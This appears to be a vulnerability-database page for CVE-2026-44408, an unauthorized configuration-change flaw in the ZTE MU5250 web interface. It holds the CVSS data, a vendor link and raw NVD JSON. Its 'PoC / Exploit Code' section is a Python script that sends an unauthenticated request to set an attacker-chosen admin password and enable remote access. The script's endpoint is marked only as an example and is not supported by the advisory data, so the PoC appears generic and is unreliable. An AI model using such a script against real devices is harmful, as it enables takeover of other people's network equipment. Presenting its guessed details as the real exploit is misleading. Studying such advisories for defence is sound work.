Security Vulnerability Report
CVE-2026-44408 CVSS 6.3 MEDIUM

Published: 2026-05-19 09:16:20
Last Modified: 2026-05-19 14:50:07

Description

There is an unauthorized access vulnerability in ZTE MU5250. Due to improper permission control of the Web interface, an unauthorized attacker can modify configuration through the interface.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H

Configurations (Affected Products)

No configuration data available.

ZTE MU5250 (for the specific affected firmware versions, refer to the vendor advisory)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target configuration URL (Example endpoint)
target_url = "http://<target_ip>/cgi-bin/config_handler"

# Attacker-controlled payload to modify device configuration
# For example, changing the SSID or admin password
payload = {
    "action": "modify",
    "admin_password": "attacker_controlled_password",
    "remote_access": "enabled"
}

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    "Content-Type": "application/x-www-form-urlencoded"
}

try:
    # Send the request without valid session cookies or authentication tokens
    response = requests.post(target_url, data=payload, headers=headers, timeout=10, verify=False)

    if response.status_code == 200 and "success" in response.text.lower():
        print("[+] Exploit successful! Configuration has been modified.")
    else:
        print(f"[-] Exploit failed. Server responded with: {response.status_code}")
        print(response.text)
except requests.exceptions.RequestException as e:
    print(f"[!] An error occurred: {e}")

References

https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/2657904255874650158

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44408", "sourceIdentifier": "[email protected]", "published": "2026-05-19T09:16:20.020", "lastModified": "2026-05-19T14:50:07.413", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is an unauthorized access vulnerability in ZTE MU5250. Due to improper permission control of the Web interface, an unauthorized attacker can  modify configuration through the interface."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/2657904255874650158", "source": "[email protected]"}]}}